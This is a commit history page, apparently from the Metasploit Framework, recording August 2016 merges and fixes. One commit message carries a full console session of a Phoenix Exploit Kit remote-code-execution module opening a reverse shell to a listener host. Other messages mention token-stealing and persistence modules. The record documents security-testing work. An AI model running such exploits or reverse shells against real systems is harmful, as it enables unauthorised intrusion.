Commit Graph

39287 Commits (5c447a6b13de331c8d1066d21f506fbbfbcc179c)

Author SHA1 Message Date
Brent Cook 5c447a6b13
Land #7240, add server_port to HTTP fingerprint 2016-08-24 13:53:31 -05:00
William Vu 61f1e7e9c2 Add server_port to HTTP fingerprint
MS-1982
2016-08-24 13:24:24 -05:00
William Vu 4bb93eebb3
Land #7239, typo fix for golden_ticket
Landing for @bcook-r7. This should be the only error of its kind.
2016-08-24 11:23:28 -05:00
Louis Sato 4a6b2ef8de
fixing typo for reference for golden ticket 2016-08-24 10:55:36 -05:00
Brendan 83160b7e49
Land #7173, Add post module to compress (zip) a file or directory 2016-08-24 09:38:04 -05:00
wchen-r7 89c3b6f399 Remove the -d flag for Linux machines 2016-08-23 18:43:50 -05:00
Pearce Barry 03e14ec86f
Land #7232, Net::SSH Regression Fixes
Fixes #7160
Fixes #7175
Fixes #7229
2016-08-23 14:53:42 -05:00
David Maloney 95b82219a3
Land #7233, ssh over L# pivot
this lands egypt's fix for using Net::SSH over L# pivots
2016-08-23 14:12:54 -05:00
Pearce Barry 222c85c343
Land #7223, Unvendor openvas-omp gem 2016-08-23 13:40:39 -05:00
William Vu 72c88e5bde
Add note about release notes to CONTRIBUTING.md 2016-08-22 15:15:22 -05:00
James Lee 8d2bdb2a71
Quote commands 2016-08-22 14:39:51 -05:00
James Lee b4a7562054
Use getpeername_as_array instead of peerinfo
`peerinfo` is intended to be human-readable and can be things like
"Remote Pipe" so splitting it here is the wrong thing to do.
2016-08-22 14:20:53 -05:00
James Lee bcf0062d47
Make SocketInterface things be Rex::Sockets 2016-08-22 14:17:00 -05:00
William Webb 3b3b4723c2
Land #7231, Fix Android Meterpreter command autoload and sysinfo 2016-08-22 12:22:43 -05:00
wchen-r7 0832833350
Land #7222, Add KB for multi/http/caidao_php_backdoor_exec 2016-08-22 11:51:02 -05:00
wchen-r7 0b73786e10 avoid bad filter 2016-08-22 11:47:39 -05:00
Jay Turla 1065b4cfe2 Linked the zip file 2016-08-23 00:33:04 +08:00
William Webb f2eb4b88a1
Land #7220, Add Phoenix Exploit Kit RCE 2016-08-22 11:16:30 -05:00
William Webb 455ba42f5b
Land #7218, Add new post-exploitation APIs for stealing access tokens 2016-08-22 10:55:42 -05:00
David Maloney 20947cd6cd
remove old dependency on net-ssh monkeypatch
the ssh_login_pubkey scanner relied on functionality that
was monkeypatched into our vendored copy. this was an unneeded solution
in the first place, and we now use a more sane method of accomplishing
the same thing
2016-08-22 10:54:09 -05:00
David Maloney b6dff719f3
add a hard require to the ssh mixin
added hard require for SSHFactory into the ssh exploit mixin
this should prevent any load-order bugs from cropping up again
2016-08-22 09:56:07 -05:00
Tim Wright 3955c4332d fix android autoload commands and sysinfo 2016-08-22 14:53:58 +01:00
Jay Turla 139d431230 eliminate space 2016-08-20 04:17:22 +08:00
dmohanty-r7 0c618cccef Use openvas-omp gem for crud operations
MS-1718
2016-08-19 15:14:32 -05:00
dmohanty-r7 4478136065 Unvendor openvas-omp gem
MS-1718
2016-08-19 15:14:32 -05:00
Jay Turla 51a2354fea Add KB for multi/http/caidao_php_backdoor_exec 2016-08-20 04:12:31 +08:00
Metasploit 87d34cfbba
Bump version of framework to 4.12.22 2016-08-19 10:02:28 -07:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
wchen-r7 265adebd50 Fix typo 2016-08-19 10:44:24 -05:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution
This module exploits a Remote Code Execution vulnerability in the web panel of Phoenix Exploit Kit via geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader, and then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
2016-08-19 21:29:55 +08:00
Rob Fuller 42462f03e2
Land #7219, ps -c listing of child processes
Awesome work by @wvu-r7 to help with identifying processes
started by the meterpreter session.
2016-08-19 00:27:06 -04:00
William Vu 3d4d7aae14 Add ps -c to show child processes of current shell 2016-08-18 19:23:21 -05:00
wchen-r7 0f4d26af19 Update yard doc 2016-08-18 17:18:16 -05:00
wchen-r7 2a61450511 Add new POST exploitation APIs for stealing a token 2016-08-18 17:08:21 -05:00
wchen-r7 b081dbf703 Make destination required 2016-08-18 15:56:16 -05:00
William Webb 3eb3c5afa2
Land #7215, Fix drupal_coder_exec bugs #7215 2016-08-18 13:43:23 -05:00
James Lee 91417e62a8
Cleanup docs 2016-08-18 10:40:32 -05:00
William Vu bc9a402d9e
Land #7214, print_brute ip:rport fix 2016-08-17 22:48:40 -05:00
William Vu 2b6576b038
Land #7012, Linux service persistence module 2016-08-17 22:45:35 -05:00
William Vu c64d91457f
Land #7003, cron/crontab persistence module 2016-08-17 22:45:16 -05:00
William Vu 2fa4c7073b
Land #6995, SSH key persistence module 2016-08-17 22:44:57 -05:00
wchen-r7 e154aafaaa On Error Resume Next for zip.vbs 2016-08-17 17:08:38 -05:00
wchen-r7 60937ec5e9 If user is SYSTEM, then steal a token before decompression 2016-08-17 16:56:09 -05:00
William Webb 667c3566e5
Land #7209, Add functionality to pull .NET versions on Windows hosts 2016-08-17 12:48:05 -05:00
William Vu 4228868c29 Clean up after yourself
Can't use FileDropper. :(
2016-08-16 23:09:14 -05:00
William Vu 1f63f8f45b Don't override payload
pl is a cheap replacement.
2016-08-16 23:08:53 -05:00
William Vu b3402a45f7 Add generic payloads
Useful for testing and custom stuff.
2016-08-16 23:08:09 -05:00